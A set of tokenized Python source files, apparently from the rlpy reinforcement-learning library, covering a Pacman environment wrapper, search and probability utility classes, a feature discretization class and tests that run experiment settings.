layout_copy , pacman , self . ghosts , DummyGraphics ( ) , self . beQuiet , catchExceptions = False ) <EOL> self . game_state . data . initialize ( self . layout_copy , self . numGhostAgents ) <EOL> self . _cleanup_graphics = True <EOL> return self . state , self . isTerminal ( ) , self . possibleActions ( ) <EOL> def possibleActions ( self ) : <EOL> if self . isTerminal ( ) : <EOL> return np . array ( [ <NUM_LIT:0> ] ) <EOL> possibleActions = [ ] <EOL> possibleMoves = pacman . GameState . getLegalActions ( <EOL> self . game_state , agentIndex = <NUM_LIT:0> ) <EOL> for a in possibleMoves : <EOL> possibleActions . append ( self . actions . index ( a ) ) <EOL> return np . array ( possibleActions ) <EOL> def isTerminal ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . game_state . data . _lose or self . game_state . data . _win <EOL> def _defaultSettings ( self ) : <EOL> self . ghostNum = <NUM_LIT:2> <EOL> self . ghosts = [ ghostAgents . RandomGhost ( <EOL> game . Agent ) for i in range ( self . ghostNum ) ] <EOL> self . beQuiet = False <EOL> def _tryToLoad ( self , fullname ) : <EOL> f = open ( fullname ) <EOL> grid = [ line . strip ( ) for line in f ] <EOL> f . close ( ) <EOL> return grid <EOL> class DummyGraphics ( object ) : <EOL> def initialize ( self , * arg , ** kwargs ) : <EOL> pass <EOL> def update ( self , * arg , ** kwargs ) : <EOL> pass <EOL> def finalize ( self , * arg , ** kwargs ) : <EOL> pass </s>
<s> import sys <EOL> import inspect <EOL> import heapq <EOL> import random <EOL> import cStringIO <EOL> class FixedRandom : <EOL> def __init__ ( self ) : <EOL> fixedState = ( <EOL> <NUM_LIT:3> , ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , 
<NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , 
<NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , 
<NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , 
<NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , None ) <EOL> self . random = random . Random ( ) <EOL> self . random . setstate ( fixedState ) <EOL> """<STR_LIT>""" <EOL> class Stack : <EOL> "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> self . list = [ ] <EOL> def push ( self , item ) : <EOL> "<STR_LIT>" <EOL> self . list . append ( item ) <EOL> def pop ( self ) : <EOL> "<STR_LIT>" <EOL> return self . list . pop ( ) <EOL> def isEmpty ( self ) : <EOL> "<STR_LIT>" <EOL> return len ( self . list ) == <NUM_LIT:0> <EOL> class Queue : <EOL> "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> self . list = [ ] <EOL> def push ( self , item ) : <EOL> "<STR_LIT>" <EOL> self . list . insert ( <NUM_LIT:0> , item ) <EOL> def pop ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . list . pop ( ) <EOL> def isEmpty ( self ) : <EOL> "<STR_LIT>" <EOL> return len ( self . list ) == <NUM_LIT:0> <EOL> class PriorityQueue : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . heap = [ ] <EOL> self . count = <NUM_LIT:0> <EOL> def push ( self , item , priority ) : <EOL> entry = ( priority , self . count , item ) <EOL> heapq . heappush ( self . heap , entry ) <EOL> self . count += <NUM_LIT:1> <EOL> def pop ( self ) : <EOL> ( _ , _ , item ) = heapq . heappop ( self . heap ) <EOL> return item <EOL> def isEmpty ( self ) : <EOL> return len ( self . heap ) == <NUM_LIT:0> <EOL> class PriorityQueueWithFunction ( PriorityQueue ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , priorityFunction ) : <EOL> "<STR_LIT>" <EOL> self . priorityFunction = priorityFunction <EOL> PriorityQueue . __init__ ( self ) <EOL> def push ( self , item ) : <EOL> "<STR_LIT>" <EOL> PriorityQueue . push ( self , item , self . 
priorityFunction ( item ) ) <EOL> def manhattanDistance ( xy1 , xy2 ) : <EOL> "<STR_LIT>" <EOL> return abs ( xy1 [ <NUM_LIT:0> ] - xy2 [ <NUM_LIT:0> ] ) + abs ( xy1 [ <NUM_LIT:1> ] - xy2 [ <NUM_LIT:1> ] ) <EOL> """<STR_LIT>""" <EOL> class Counter ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __getitem__ ( self , idx ) : <EOL> self . setdefault ( idx , <NUM_LIT:0> ) <EOL> return dict . __getitem__ ( self , idx ) <EOL> def incrementAll ( self , keys , count ) : <EOL> """<STR_LIT>""" <EOL> for key in keys : <EOL> self [ key ] += count <EOL> def argMax ( self ) : <EOL> """<STR_LIT>""" <EOL> if len ( self . keys ( ) ) == <NUM_LIT:0> : <EOL> return None <EOL> all = self . items ( ) <EOL> values = [ x [ <NUM_LIT:1> ] for x in all ] <EOL> maxIndex = values . index ( max ( values ) ) <EOL> return all [ maxIndex ] [ <NUM_LIT:0> ] <EOL> def sortedKeys ( self ) : <EOL> """<STR_LIT>""" <EOL> sortedItems = self . items ( ) <EOL> compare = lambda x , y : sign ( y [ <NUM_LIT:1> ] - x [ <NUM_LIT:1> ] ) <EOL> sortedItems . sort ( cmp = compare ) <EOL> return [ x [ <NUM_LIT:0> ] for x in sortedItems ] <EOL> def totalCount ( self ) : <EOL> """<STR_LIT>""" <EOL> return sum ( self . values ( ) ) <EOL> def normalize ( self ) : <EOL> """<STR_LIT>""" <EOL> total = float ( self . totalCount ( ) ) <EOL> if total == <NUM_LIT:0> : <EOL> return <EOL> for key in self . keys ( ) : <EOL> self [ key ] = self [ key ] / total <EOL> def divideAll ( self , divisor ) : <EOL> """<STR_LIT>""" <EOL> divisor = float ( divisor ) <EOL> for key in self : <EOL> self [ key ] /= divisor <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> return Counter ( dict . copy ( self ) ) <EOL> def __mul__ ( self , y ) : <EOL> """<STR_LIT>""" <EOL> sum = <NUM_LIT:0> <EOL> x = self <EOL> if len ( x ) > len ( y ) : <EOL> x , y = y , x <EOL> for key in x : <EOL> if key not in y : <EOL> continue <EOL> sum += x [ key ] * y [ key ] <EOL> return sum <EOL> def __radd__ ( self , y ) : <EOL> """<STR_LIT>""" <EOL> for key , value in y . 
items ( ) : <EOL> self [ key ] += value <EOL> def __add__ ( self , y ) : <EOL> """<STR_LIT>""" <EOL> addend = Counter ( ) <EOL> for key in self : <EOL> if key in y : <EOL> addend [ key ] = self [ key ] + y [ key ] <EOL> else : <EOL> addend [ key ] = self [ key ] <EOL> for key in y : <EOL> if key in self : <EOL> continue <EOL> addend [ key ] = y [ key ] <EOL> return addend <EOL> def __sub__ ( self , y ) : <EOL> """<STR_LIT>""" <EOL> addend = Counter ( ) <EOL> for key in self : <EOL> if key in y : <EOL> addend [ key ] = self [ key ] - y [ key ] <EOL> else : <EOL> addend [ key ] = self [ key ] <EOL> for key in y : <EOL> if key in self : <EOL> continue <EOL> addend [ key ] = - <NUM_LIT:1> * y [ key ] <EOL> return addend <EOL> def raiseNotDefined ( ) : <EOL> fileName = inspect . stack ( ) [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> line = inspect . stack ( ) [ <NUM_LIT:1> ] [ <NUM_LIT:2> ] <EOL> method = inspect . stack ( ) [ <NUM_LIT:1> ] [ <NUM_LIT:3> ] <EOL> print "<STR_LIT>" % ( method , line , fileName ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def normalize ( vectorOrCounter ) : <EOL> """<STR_LIT>""" <EOL> normalizedCounter = Counter ( ) <EOL> if isinstance ( vectorOrCounter , type ( normalizedCounter ) ) : <EOL> counter = vectorOrCounter <EOL> total = float ( counter . totalCount ( ) ) <EOL> if total == <NUM_LIT:0> : <EOL> return counter <EOL> for key in counter . keys ( ) : <EOL> value = counter [ key ] <EOL> normalizedCounter [ key ] = value / total <EOL> return normalizedCounter <EOL> else : <EOL> vector = vectorOrCounter <EOL> s = float ( sum ( vector ) ) <EOL> if s == <NUM_LIT:0> : <EOL> return vector <EOL> return [ el / s for el in vector ] <EOL> def nSample ( distribution , values , n ) : <EOL> if sum ( distribution ) != <NUM_LIT:1> : <EOL> distribution = normalize ( distribution ) <EOL> rand = sorted ( [ random . 
random ( ) for i in range ( n ) ] ) <EOL> samples = [ ] <EOL> samplePos , distPos , cdf = <NUM_LIT:0> , <NUM_LIT:0> , distribution [ <NUM_LIT:0> ] <EOL> while samplePos < n : <EOL> if rand [ samplePos ] < cdf : <EOL> samplePos += <NUM_LIT:1> <EOL> samples . append ( values [ distPos ] ) <EOL> else : <EOL> distPos += <NUM_LIT:1> <EOL> cdf += distribution [ distPos ] <EOL> return samples <EOL> def sample ( distribution , values = None ) : <EOL> if isinstance ( distribution , Counter ) : <EOL> items = distribution . items ( ) <EOL> distribution = [ i [ <NUM_LIT:1> ] for i in items ] <EOL> values = [ i [ <NUM_LIT:0> ] for i in items ] <EOL> if sum ( distribution ) != <NUM_LIT:1> : <EOL> distribution = normalize ( distribution ) <EOL> choice = random . random ( ) <EOL> i , total = <NUM_LIT:0> , distribution [ <NUM_LIT:0> ] <EOL> while choice > total : <EOL> i += <NUM_LIT:1> <EOL> total += distribution [ i ] <EOL> return values [ i ] <EOL> def sampleFromCounter ( ctr ) : <EOL> items = ctr . items ( ) <EOL> return sample ( [ v for k , v in items ] , [ k for k , v in items ] ) <EOL> def getProbability ( value , distribution , values ) : <EOL> """<STR_LIT>""" <EOL> total = <NUM_LIT:0.0> <EOL> for prob , val in zip ( distribution , values ) : <EOL> if val == value : <EOL> total += prob <EOL> return total <EOL> def flipCoin ( p ) : <EOL> r = random . random ( ) <EOL> return r < p <EOL> def chooseFromDistribution ( distribution ) : <EOL> "<STR_LIT>" <EOL> if isinstance ( distribution , dict ) or isinstance ( distribution , Counter ) : <EOL> return sample ( distribution ) <EOL> r = random . 
random ( ) <EOL> base = <NUM_LIT:0.0> <EOL> for prob , element in distribution : <EOL> base += prob <EOL> if r <= base : <EOL> return element <EOL> def nearestPoint ( pos ) : <EOL> """<STR_LIT>""" <EOL> ( current_row , current_col ) = pos <EOL> grid_row = int ( current_row + <NUM_LIT:0.5> ) <EOL> grid_col = int ( current_col + <NUM_LIT:0.5> ) <EOL> return ( grid_row , grid_col ) <EOL> def sign ( x ) : <EOL> """<STR_LIT>""" <EOL> if ( x >= <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return - <NUM_LIT:1> <EOL> def arrayInvert ( array ) : <EOL> """<STR_LIT>""" <EOL> result = [ [ ] for i in array ] <EOL> for outer in array : <EOL> for inner in range ( len ( outer ) ) : <EOL> result [ inner ] . append ( outer [ inner ] ) <EOL> return result <EOL> def matrixAsList ( matrix , value = True ) : <EOL> """<STR_LIT>""" <EOL> rows , cols = len ( matrix ) , len ( matrix [ <NUM_LIT:0> ] ) <EOL> cells = [ ] <EOL> for row in range ( rows ) : <EOL> for col in range ( cols ) : <EOL> if matrix [ row ] [ col ] == value : <EOL> cells . append ( ( row , col ) ) <EOL> return cells <EOL> def lookup ( name , namespace ) : <EOL> """<STR_LIT>""" <EOL> dots = name . count ( '<STR_LIT:.>' ) <EOL> if dots > <NUM_LIT:0> : <EOL> moduleName , objName = '<STR_LIT:.>' . join ( <EOL> name . split ( '<STR_LIT:.>' ) [ : - <NUM_LIT:1> ] ) , name . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> module = __import__ ( moduleName ) <EOL> return getattr ( module , objName ) <EOL> else : <EOL> modules = [ obj for obj in namespace . values ( ) if str ( <EOL> type ( obj ) ) == "<STR_LIT>" ] <EOL> options = [ getattr ( module , name ) <EOL> for module in modules if name in dir ( module ) ] <EOL> options += [ obj [ <NUM_LIT:1> ] for obj in namespace . 
items ( ) if obj [ <NUM_LIT:0> ] == name ] <EOL> if len ( options ) == <NUM_LIT:1> : <EOL> return options [ <NUM_LIT:0> ] <EOL> if len ( options ) > <NUM_LIT:1> : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> raise Exception ( '<STR_LIT>' % name ) <EOL> def pause ( ) : <EOL> """<STR_LIT>""" <EOL> print "<STR_LIT>" <EOL> raw_input ( ) <EOL> import signal <EOL> import time <EOL> class TimeoutFunctionException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class TimeoutFunction : <EOL> def __init__ ( self , function , timeout ) : <EOL> self . timeout = timeout <EOL> self . function = function <EOL> def handle_timeout ( self , signum , frame ) : <EOL> raise TimeoutFunctionException ( ) <EOL> def __call__ ( self , * args , ** keyArgs ) : <EOL> if hasattr ( signal , '<STR_LIT>' ) : <EOL> old = signal . signal ( signal . SIGALRM , self . handle_timeout ) <EOL> signal . alarm ( self . timeout ) <EOL> try : <EOL> result = self . function ( * args , ** keyArgs ) <EOL> finally : <EOL> signal . signal ( signal . SIGALRM , old ) <EOL> signal . alarm ( <NUM_LIT:0> ) <EOL> else : <EOL> startTime = time . time ( ) <EOL> result = self . function ( * args , ** keyArgs ) <EOL> timeElapsed = time . time ( ) - startTime <EOL> if timeElapsed >= self . timeout : <EOL> self . handle_timeout ( None , None ) <EOL> return result <EOL> _ORIGINAL_STDOUT = None <EOL> _ORIGINAL_STDERR = None <EOL> _MUTED = False <EOL> class WritableNull : <EOL> def write ( self , string ) : <EOL> pass <EOL> def mutePrint ( ) : <EOL> global _ORIGINAL_STDOUT , _ORIGINAL_STDERR , _MUTED <EOL> if _MUTED : <EOL> return <EOL> _MUTED = True <EOL> _ORIGINAL_STDOUT = sys . stdout <EOL> sys . stdout = WritableNull ( ) <EOL> def unmutePrint ( ) : <EOL> global _ORIGINAL_STDOUT , _ORIGINAL_STDERR , _MUTED <EOL> if not _MUTED : <EOL> return <EOL> _MUTED = False <EOL> sys . stdout = _ORIGINAL_STDOUT </s>
<s> """<STR_LIT>""" <EOL> from . Representation import Representation <EOL> import numpy as np <EOL> __copyright__ = "<STR_LIT>" <EOL> __credits__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] <EOL> __license__ = "<STR_LIT>" <EOL> __author__ = "<STR_LIT>" <EOL> class IndependentDiscretization ( Representation ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , domain , discretization = <NUM_LIT:20> ) : <EOL> self . setBinsPerDimension ( domain , discretization ) <EOL> self . features_num = int ( sum ( self . bins_per_dim ) ) <EOL> self . maxFeatureIDperDimension = np . cumsum ( self . bins_per_dim ) - <NUM_LIT:1> <EOL> super ( <EOL> IndependentDiscretization , <EOL> self ) . __init__ ( <EOL> domain , <EOL> discretization ) <EOL> def phi_nonTerminal ( self , s ) : <EOL> F_s = np . zeros ( <EOL> self . features_num , <EOL> '<STR_LIT:bool>' ) <EOL> F_s [ self . activeInitialFeatures ( s ) ] = <NUM_LIT:1> <EOL> return F_s <EOL> def getDimNumber ( self , f ) : <EOL> dim = np . searchsorted ( self . maxFeatureIDperDimension , f ) <EOL> return dim <EOL> def getFeatureName ( self , feat_id ) : <EOL> if hasattr ( self . domain , '<STR_LIT>' ) : <EOL> dim = np . searchsorted ( self . maxFeatureIDperDimension , feat_id ) <EOL> index_in_dim = feat_id <EOL> if dim != <NUM_LIT:0> : <EOL> index_in_dim = feat_id - self . maxFeatureIDperDimension [ dim - <NUM_LIT:1> ] <EOL> print self . domain . DimNames [ dim ] <EOL> f_name = self . domain . DimNames [ dim ] + '<STR_LIT:=>' + str ( index_in_dim ) <EOL> def featureType ( self ) : <EOL> return bool </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from nose . tools import ok_ , eq_ <EOL> import glob <EOL> import logging <EOL> from rlpy . Tools . run import read_setting_content <EOL> __copyright__ = "<STR_LIT>" <EOL> __credits__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] <EOL> __license__ = "<STR_LIT>" <EOL> def test_all_100_step ( ) : <EOL> for fn in glob . glob ( "<STR_LIT>" ) : <EOL> if fn in glob . glob ( "<STR_LIT>" ) : <EOL> continue ; <EOL> if "<STR_LIT>" in fn or "<STR_LIT>" in fn : <EOL> continue <EOL> yield check_running , fn , <NUM_LIT:100> <EOL> def check_running ( filename , steps ) : <EOL> content = read_setting_content ( filename ) <EOL> local = { } <EOL> exec content in local <EOL> make_experiment = local [ "<STR_LIT>" ] <EOL> exp = make_experiment ( exp_id = <NUM_LIT:1> , path = "<STR_LIT>" ) <EOL> exp . max_steps = steps <EOL> exp . config_logging = False <EOL> exp . num_policy_checks = <NUM_LIT:2> <EOL> exp . checks_per_policy = <NUM_LIT:1> <EOL> exp . run ( ) <EOL> def test_tutorial ( ) : <EOL> content = read_setting_content ( "<STR_LIT>" ) <EOL> local = { } <EOL> exec content in local <EOL> make_experiment = local [ "<STR_LIT>" ] <EOL> exp = make_experiment ( exp_id = <NUM_LIT:1> , path = "<STR_LIT>" ) <EOL> exp . 